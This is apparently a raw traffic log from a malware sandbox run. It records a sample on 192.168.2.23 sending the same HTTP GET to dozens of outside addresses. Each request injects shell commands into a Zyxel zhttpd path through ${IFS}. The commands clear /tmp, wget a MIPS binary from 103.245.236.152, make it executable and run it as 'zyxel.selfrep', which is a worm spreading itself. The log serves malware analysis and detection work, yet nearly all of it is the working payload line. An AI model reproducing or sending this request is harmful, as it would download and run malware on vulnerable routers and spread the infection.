                                          Jan 14, 2024 15:45:50.656708956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          242192.168.2.2352086114.199.179.151443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.656737089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          243192.168.2.2337304153.150.140.180443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.656769991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          244192.168.2.23401782.138.133.184443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.656812906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          245192.168.2.236072693.180.168.181443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.656831980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          246192.168.2.233780249.194.85.105443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.656867981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          247192.168.2.2342942136.45.4.168443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.656924963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          248192.168.2.2358526195.127.27.216443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.656953096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          249192.168.2.2356754180.136.152.208443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.656969070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          250192.168.2.2338364203.36.175.113443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.656991005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          251192.168.2.2352232173.224.240.139443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.657018900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          252192.168.2.234855064.182.43.35443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:51.658890963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          253192.168.2.234317032.100.123.170443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:51.658925056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          254192.168.2.2332994204.196.126.34443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:51.658952951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          255192.168.2.2351182190.48.30.172443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:51.658961058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          256192.168.2.2345368208.81.164.179443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:51.658977985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          257192.168.2.233295249.134.11.141443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:51.658987045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          258192.168.2.2341150172.15.51.238443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:51.659024000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          259192.168.2.2335010181.144.244.233443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:51.659035921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          260192.168.2.2334094172.6.193.93443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:51.659058094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          261192.168.2.2343862170.187.250.16443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:51.659059048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          262192.168.2.2360052147.103.130.127443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:51.659116030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          263192.168.2.2334740204.50.91.55443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:51.659116030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          264192.168.2.234979262.234.67.240443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:51.659116030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          265192.168.2.233558670.221.73.45443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:51.659136057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          266192.168.2.2352330135.116.243.193443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:51.659147024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          267192.168.2.233304441.236.164.197443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:51.659214020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          268192.168.2.234539466.11.185.204443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:51.659208059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          269192.168.2.2342228118.97.76.61443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:51.659245968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          270192.168.2.234414459.9.151.1443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:51.659276009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          271192.168.2.233756892.238.183.201443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:51.659312010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          272192.168.2.2341698185.11.73.83443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:51.659317017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          273192.168.2.2357576131.45.38.189443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:51.659343958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          274192.168.2.2346804110.215.50.192443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:51.659368038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          275192.168.2.233705688.36.95.224443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:51.659392118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          276192.168.2.234791276.85.70.40443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:51.659404039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          277192.168.2.233671280.26.1.154443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:51.659631968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          278192.168.2.233552273.87.251.32443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:51.659683943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          279192.168.2.2350616180.213.57.191443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:51.659698009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          280192.168.2.236083077.32.69.16443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:51.659746885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          281192.168.2.235662468.117.195.133443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:51.659919024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          282192.168.2.235300448.253.224.227443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:51.659919024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          283192.168.2.234550053.255.238.58443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:51.659945965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          284192.168.2.2345816183.173.203.102443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:51.659945965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          285192.168.2.235198417.229.205.17443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:51.660010099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          286192.168.2.235870645.214.174.87443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:51.660159111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          287192.168.2.2351276143.165.237.16443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:52.662379980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          288192.168.2.2357990137.53.78.107443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:52.662425041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          289192.168.2.2354300141.117.171.18443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:52.662426949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          290192.168.2.2348428210.29.46.45443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:52.662462950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          291192.168.2.234855259.108.117.110443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:52.662501097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          292192.168.2.2341010144.101.170.76443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:52.662520885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          293192.168.2.2348382219.221.64.119443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:52.662534952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          294192.168.2.2348366203.51.44.41443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:52.662549973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          295192.168.2.2341620137.7.8.148443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:52.662574053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          296192.168.2.2348102192.19.60.245443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:52.662617922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          297192.168.2.2350702209.217.237.7443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:52.662617922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          298192.168.2.23392305.237.74.17443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:52.662648916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          299192.168.2.2334490109.160.148.29443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:52.662650108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          300192.168.2.2349346173.115.209.158443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:52.662664890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          301192.168.2.2338244219.22.135.164443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:52.662678957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          302192.168.2.2339986173.30.104.175443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:52.662996054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          303192.168.2.2353530170.54.205.99443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:52.663036108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          304192.168.2.2337990187.209.251.216443
                                          TimestampBytes transferredDirectionData
